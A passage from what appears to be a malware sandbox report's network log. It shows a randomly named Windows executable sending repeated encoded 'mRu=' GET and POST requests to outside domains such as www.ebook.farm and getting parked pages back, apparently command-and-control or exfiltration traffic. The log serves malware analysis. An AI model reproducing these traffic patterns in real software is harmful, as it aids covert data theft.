                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6d 70 38 31 47 77 68 6f 64 34 59 43 59 55 5a 65 48 72 4d 61 43 39 47 39 7a 73 69 4b 70 59 38 42 4a 32 4a 33 4f 69 38 2f 39 63 57 38 57 54 54 61 30 78 69 75 69 6b 47 59 33 79 42 4c 42 59 46 4b 67 59 69 66 53 6c 4a 56 30 42 76 77 56 36 72 79 2f 38 4a 64 79 70 79 66 47 4b 6a 67 36 4e 76 71 48 2f 49 37 74 54 52 42 35 71 4c 67 66 4e 42 31 63 49 59 4f 59 64 63 76 34 39 4b 62 4c 49 39 45 56 4d 2f 68 2b 61 49 4e 67 68 63 45 37 44 46 47 41 63 32 47 7a 68 49 61 49 44 52 48 6a 53 42 36 73 33 77 70 74 65 61 63 6c 77 4a 73 51 57 4e 6b 35 34 69 37 48 46 65 67 72 5a 38 77 33 35 2f 71 51 58 54 5a 6f 67 46 48 2f 31 77 37 62 56 58 75 50 78 4d 4a 55 6e 4a 41 67 4f 31 30 35 54 32 61 4b 43 2b 50 35 43 78 62 79 61 58 53 4c 38 51 39 36 30 72 30 37 35 5a 61 4b 69 6b 5a 38 74 56 73 61 7a 37 39 41 6b 2f 49 6d 41 6d 70 51 6e 6f 70 2b 76 62 69 32 42 55 47 39 56 62 76 2f 53 6c 43 34 49 30 47 53 46 6e 74 4c 53 34 57 34 49 75 66 4a 64 64 4f 37 6c 36 31 59 6c 7a 62 6c 6d 4d 66 4d 6c 42 37 4e 4d 32 37 76 5a 4e 56 37 75 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=mp81Gwhod4YCYUZeHrMaC9G9zsiKpY8BJ2J3Oi8/9cW8WTTa0xiuikGY3yBLBYFKgYifSlJV0BvwV6ry/8JdypyfGKjg6NvqH/I7tTRB5qLgfNB1cIYOYdcv49KbLI9EVM/h+aINghcE7DFGAc2GzhIaIDRHjSB6s3wpteaclwJsQWNk54i7HFegrZ8w35/qQXTZogFH/1w7bVXuPxMJUnJAgO105T2aKC+P5CxbyaXSL8Q960r075ZaKikZ8tVsaz79Ak/ImAmpQnop+vbi2BUG9Vbv/SlC4I0GSFntLS4W4IufJddO7l61YlzblmMfMlB7NM27vZNV7uFit+hbqQhfbfRnw1PFXZ7UAYC5zxICq1oNiOQkuvMUAZpjjeoXiadCk3YlzAmtoyFmXHfvW6KNJzTCYAVs3MH1M5UeKVvma3RjS8BVquAdCHNgSmfO/4eApEsYUctSz0hDKHxfPzLL5hFEDCX1+RMlr5VIvwt5zmEMet/xkYYdy26uxwjh9sek3jryjApOc5NQk2fwduYnxVwa6WigQL1+EqU0wK86MmRmqYdA2wLEd+ew42eh4fEey2dGlHgH2EIFJwTiuz9KGL1CIW5hs8sFDJ3YPAv3LnUkgH+VRfxoAdI8/EJovgOp/s0dMzxXhaHw7xwv0/w7oP7PF9HP1FosETKCGy8wQwOZcIUPio0ow3FydPSuuLkH+i/xbLg87ZqCCH98W3dIoOMlmj8gVXVKC4N5Cg14lxz3HWDPnjQ7Xr1uW8+uV7TuusimaXrk3D9aPKXMBJC6YzLflM1a0w9r8pEoWByTcGnlyFGPEK4oZG8sUNqdEUU7/+R3cQxXshS5MYH4ks1nK9bo+I4mJL/hMuXDhO8c9RFkpGSgkZRWfMblLXv0JKX3fX08MY1MrFUIqwH+6w9qSbx2r0rfe0xTgC5fapi7GySWUMIL0GWE39/6n/LWGBEH602jeM9c8qXVPtj9bkIrQHAXWx2ugkhUvIwqtf5+rR+0 [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:33:11.753031015 CET5338OUTData Raw: 50 7a 78 42 33 47 76 61 32 39 35 33 66 55 4b 54 63 4e 43 78 52 47 59 66 4f 4d 6d 63 6e 59 73 72 39 73 68 6b 65 6b 65 4d 59 57 48 78 70 74 58 47 2f 54 4a 50 56 39 33 48 7a 44 7a 70 4a 58 55 4c 4f 77 52 37 34 5a 68 32 4b 42 65 51 4c 59 53 58 72 47
                                                                                                                            Data Ascii: PzxB3Gva2953fUKTcNCxRGYfOMmcnYsr9shkekeMYWHxptXG/TJPV93HzDzpJXULOwR74Zh2KBeQLYSXrGOMSFfqGQ00+WmVLI16EFGtHRqYkHD1GsXQSLPcA1qW9GxFdKGBL3bmqmgnzoXD8kolteycdnNFHlUFamfG1tKnP3Vy4MF6Muma4rUzkJyiOwFpP2j2lyEwVKSR4yfVrcsqYwp9sHVtZBf3UtS4R2KDBk2CG9L/OGT
                                                                                                                            Nov 12, 2024 15:33:11.888657093 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:10 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1118
                                                                                                                            x-request-id: d0068f2e-0420-4889-8d13-871af46e5c42
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==
                                                                                                                            set-cookie: parking_session=d0068f2e-0420-4889-8d13-871af46e5c42; expires=Tue, 12 Nov 2024 14:48:11 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 4b 38 51 31 36 4c 45 58 4d 47 78 73 6f 39 57 44 41 32 34 47 32 71 77 58 35 32 2f 79 52 64 6b 68 6e 41 73 4c 70 39 4b 67 32 64 4f 78 4a 39 42 78 69 31 55 30 67 79 4d 6f 75 53 77 59 4c 46 48 70 66 74 47 6d 45 41 6b 37 34 57 36 71 37 62 32 68 71 45 65 52 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZK8Q16LEXMGxso9WDA24G2qwX52/yRdkhnAsLp9Kg2dOxJ9Bxi1U0gyMouSwYLFHpftGmEAk74W6q7b2hqEeRw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:11.888705969 CET518INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDAwNjhmMmUtMDQyMC00ODg5LThkMTMtODcxYWY0NmU1YzQyIiwicGFnZV90aW1lIjoxNzMxNDIxOTkxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            56192.168.11.2049775199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:14.417087078 CET475OUTGET /x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.vnxoso88.art
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:33:14.555088043 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:13 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1438
                                                                                                                            x-request-id: 1e0ebd8b-6a91-4ab6-9bec-87ed8bbd5507
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hQEa0qE2gjTR9pWA89C24hLQuC454KHjMxzupAr3oT8o/9HsWmsDZl8hpOUGzC/g23P+vOvESCjEaiGsdV4IyA==
                                                                                                                            set-cookie: parking_session=1e0ebd8b-6a91-4ab6-9bec-87ed8bbd5507; expires=Tue, 12 Nov 2024 14:48:14 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 51 45 61 30 71 45 32 67 6a 54 52 39 70 57 41 38 39 43 32 34 68 4c 51 75 43 34 35 34 4b 48 6a 4d 78 7a 75 70 41 72 33 6f 54 38 6f 2f 39 48 73 57 6d 73 44 5a 6c 38 68 70 4f 55 47 7a 43 2f 67 32 33 50 2b 76 4f 76 45 53 43 6a 45 61 69 47 73 64 56 34 49 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hQEa0qE2gjTR9pWA89C24hLQuC454KHjMxzupAr3oT8o/9HsWmsDZl8hpOUGzC/g23P+vOvESCjEaiGsdV4IyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:14.555140018 CET838INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWUwZWJkOGItNmE5MS00YWI2LTliZWMtODdlZDhiYmQ1NTA3IiwicGFnZV90aW1lIjoxNzMxNDIxOTk0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudm54b3NvODguYXJ0L3g


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            57192.168.11.2049776199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:19.961199045 CET741OUTPOST /rzaq/ HTTP/1.1
                                                                                                                            Host: www.ebook.farm
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ebook.farm
                                                                                                                            Referer: http://www.ebook.farm/rzaq/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 49 64 58 70 77 4c 52 32 4f 6c 52 70 6b 2b 6e 6b 71 35 54 4e 64 79 49 2b 33 71 6b 4c 62 45 58 49 46 44 46 61 47 72 65 4a 4c 31 38 72 50 75 4c 51 34 61 65 37 6d 2f 37 56 33 66 77 36 67 6f 6e 58 2f 50 62 4a 57 37 72 4d 73 63 67 75 33 36 34 57 4b 2f 76 4e 52 6d 67 49 57 4b 57 4f 4d 34 61 7a 71 57 68 75 39 4d 5a 6d 4a 32 4d 47 54 5a 52 39 66 45 63 37 6c 2f 44 56 69 37 44 6c 6f 4a 35 32 71 70 74 2f 77 30 37 6e 44 72 62 61 39 6c 48 47 30 67 50 37 51 75 45 34 51 4a 31 53 38 4c 4d 65 61 4d 52 30 70 48 53 61 49 55 77 6d 73 69 44 69 48 32 67 79 32 41 3d 3d
                                                                                                                            Data Ascii: mRu=f5tiCBkTO6WWIdXpwLR2OlRpk+nkq5TNdyI+3qkLbEXIFDFaGreJL18rPuLQ4ae7m/7V3fw6gonX/PbJW7rMscgu364WK/vNRmgIWKWOM4azqWhu9MZmJ2MGTZR9fEc7l/DVi7DloJ52qpt/w07nDrba9lHG0gP7QuE4QJ1S8LMeaMR0pHSaIUwmsiDiH2gy2A==
                                                                                                                            Nov 12, 2024 15:33:20.096149921 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:19 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1110
                                                                                                                            x-request-id: 746f3cd9-10af-4e2b-84df-f64ca43be48c
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==
                                                                                                                            set-cookie: parking_session=746f3cd9-10af-4e2b-84df-f64ca43be48c; expires=Tue, 12 Nov 2024 14:48:20 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:20.096163034 CET510INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzQ2ZjNjZDktMTBhZi00ZTJiLTg0ZGYtZjY0Y2E0M2JlNDhjIiwicGFnZV90aW1lIjoxNzMxNDIyMDAwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            58192.168.11.2049777199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:22.613907099 CET761OUTPOST /rzaq/ HTTP/1.1
                                                                                                                            Host: www.ebook.farm
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ebook.farm
                                                                                                                            Referer: http://www.ebook.farm/rzaq/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 4b 35 54 70 31 73 46 32 50 46 52 6f 39 65 6e 6b 6b 70 54 57 64 79 4d 2b 33 76 41 68 48 68 48 49 4c 48 42 61 48 71 65 4a 46 56 38 72 41 4f 4c 56 32 36 65 47 6d 2f 6d 6f 33 65 4d 36 67 6f 7a 58 2f 4b 66 4a 57 4a 44 54 73 4d 67 73 2b 61 34 55 56 76 76 4e 52 6d 67 49 57 4b 44 56 4d 34 53 7a 71 6e 52 75 38 70 35 68 4b 32 4d 5a 61 35 52 39 4e 30 63 46 6c 2f 44 4e 69 36 66 50 6f 50 39 32 71 6f 64 2f 78 6d 54 6b 61 62 61 52 67 31 47 5a 36 42 6d 4d 51 4d 38 4e 59 4a 6c 6f 30 70 6f 58 57 36 63 75 30 31 6d 2b 4c 48 73 55 6f 53 36 4b 46 30 68 70 72 43 65 5a 61 7a 4c 45 57 44 45 6b 74 6c 4f 75 78 71 4b 52 57 45 77 3d
                                                                                                                            Data Ascii: mRu=f5tiCBkTO6WWK5Tp1sF2PFRo9enkkpTWdyM+3vAhHhHILHBaHqeJFV8rAOLV26eGm/mo3eM6gozX/KfJWJDTsMgs+a4UVvvNRmgIWKDVM4SzqnRu8p5hK2MZa5R9N0cFl/DNi6fPoP92qod/xmTkabaRg1GZ6BmMQM8NYJlo0poXW6cu01m+LHsUoS6KF0hprCeZazLEWDEktlOuxqKRWEw=
                                                                                                                            Nov 12, 2024 15:33:22.757242918 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:22 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1110
                                                                                                                            x-request-id: 5b9c4b87-37f6-4a92-a502-3db43dec3d3e
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==
                                                                                                                            set-cookie: parking_session=5b9c4b87-37f6-4a92-a502-3db43dec3d3e; expires=Tue, 12 Nov 2024 14:48:22 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:22.757293940 CET510INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWI5YzRiODctMzdmNi00YTkyLWE1MDItM2RiNDNkZWMzZDNlIiwicGFnZV90aW1lIjoxNzMxNDIyMDAyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            59192.168.11.2049778199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:25.272731066 CET2578OUTPOST /rzaq/ HTTP/1.1
                                                                                                                            Host: www.ebook.farm
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.ebook.farm
                                                                                                                            Referer: http://www.ebook.farm/rzaq/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
